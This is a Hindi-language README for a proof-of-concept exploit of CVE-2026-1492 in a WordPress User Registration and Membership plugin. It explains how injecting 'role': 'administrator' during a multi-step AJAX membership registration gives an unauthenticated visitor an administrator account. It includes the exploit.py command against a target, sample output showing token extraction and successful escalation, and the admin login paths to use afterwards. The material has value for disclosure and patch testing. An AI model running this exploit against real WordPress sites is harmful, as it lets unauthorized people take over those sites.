
CVE-2026-1492 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, WordPress User Registration प्लगइन में, जो तैयार की गई सदस्यता पंजीकरण के माध्यम से बिना प्रमाणीकरण के एडमिनिस्ट्रेटर तक विशेषाधिकार वृद्धि को सक्षम बनाता है।
इस रिपॉज़िटरी में CVE-2026-1492 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट शामिल है, जो WordPress यूज़र रजिस्ट्रेशन एंड मेंबरशिप प्लगइन को प्रभावित करने वाली एक गंभीर कमज़ोरी है।
यह कमज़ोरी अनप्रमाणित हमलावरों को मेंबरशिप रजिस्ट्रेशन प्रक्रिया का दुरुपयोग करके एडमिनिस्ट्रेटर खाते बनाने की अनुमति देती है।
👉 इस कमज़ोरी का पूर्ण तकनीकी विश्लेषण यहाँ उपलब्ध है:
तकनीकी विश्लेषण
यह चरण-दर-चरण बताता है कि बैकएंड हमलावर-नियंत्रित डेटा को कैसे संसाधित करता है और प्रिविलेज एस्केलेशन क्यों संभव है।
प्लगइन मेंबरशिप रजिस्ट्रेशन प्रक्रिया के दौरान उपयोगकर्ता-नियंत्रित इनपुट पर अनुचित रूप से भरोसा करता है।
विशेष रूप से:
role को स्वीकार करता हैयह हमलावरों को निम्न सेट करने की अनुमति देता है:
"role": "administrator"
और पूर्ण एडमिनिस्ट्रेटिव पहुंच प्राप्त करने की।
सफल शोषण निम्न की अनुमति देता है:
कमज़ोरी बहु-चरणीय AJAX प्रक्रिया के माध्यम से ट्रिगर होती है:
user_registration_user_form_submit के माध्यम से एक उपयोगकर्ता पंजीकृत करेंuser_registration_membership_register_member के माध्यम से मेंबरशिप रजिस्ट्रेशन ट्रिगर करेंadministrator) इंजेक्ट करेंpython3 exploit.py -t http://target -ru 'http://target/?page_id=6'
python3 exploit.py -t http://localhost:5000 -ru 'http://localhost:5000/?page_id=6'
[*] Extracting tokens...
[+] form_id: 5
[+] frontend_nonce: XXXXX
[+] security: XXXXX
[+] wpnonce: XXXXX
[+] membership_id: 12
[*] Sending registration request...
[+] User created
[*] Sending membership request...
[+] Privilege escalation successful
उत्पन्न क्रेडेंशियल्स का उपयोग करके लॉगिन करें:
http://target/wp-login.php
फिर एडमिन पैनल तक पहुंचें:
http://target/wp-admin/
नोट: एडमिन पथ अनुकूलित हो सकता है।
यह एक्सप्लॉइट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।
बिना अनुमति के सिस्टम के विरुद्ध उपयोग न करें।